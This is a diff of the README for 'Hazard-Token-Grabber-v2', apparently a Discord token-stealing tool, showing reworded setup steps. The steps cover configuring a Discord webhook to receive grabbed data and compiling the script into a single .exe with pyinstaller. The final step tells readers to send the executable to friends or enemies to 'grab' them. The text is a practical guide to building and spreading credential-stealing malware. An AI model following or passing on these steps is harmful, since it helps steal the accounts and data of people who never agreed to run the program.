gumbobrot/Hazard-Token-Grabber-v2/README.md

 - _Step 3 help > You need help with creating a webhook??_ [Here is a simple tutorial!](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks)

-- [x] (Step 4:) You can also change the settings from line 30 to 37. (optional) True is enabling the setting, false is disbaling a setting.
+- [x] Step 4: (optional) You can also change the settings from line 30 to 37.
+True is enabling the setting, false is disbaling a setting.
 Easy!`

 - [x] Step 5: How do I compile this shit now?
 That's pretty easy!
 Just run this command after you opened a command prompt in the Hazard-Grabber Directory and run this command: "pyinstaller hazard-v3.py --onefile".
 Now wait for it to compile the file.

-- [x] (Step 6:) Change the ICON. (optional) I don't know good programs for this at the moment.
+- [x] Step 6: (optional) Change the Icon.
+I don't know good programs for this at the moment.
 I will try to add this soon.
 If you know how to do this, let me know under the "Issues" ➤➤  "Suggestions" Tab.

 - [x] Step 7: Send the created .exe to your friends to troll them or grab your enemys!!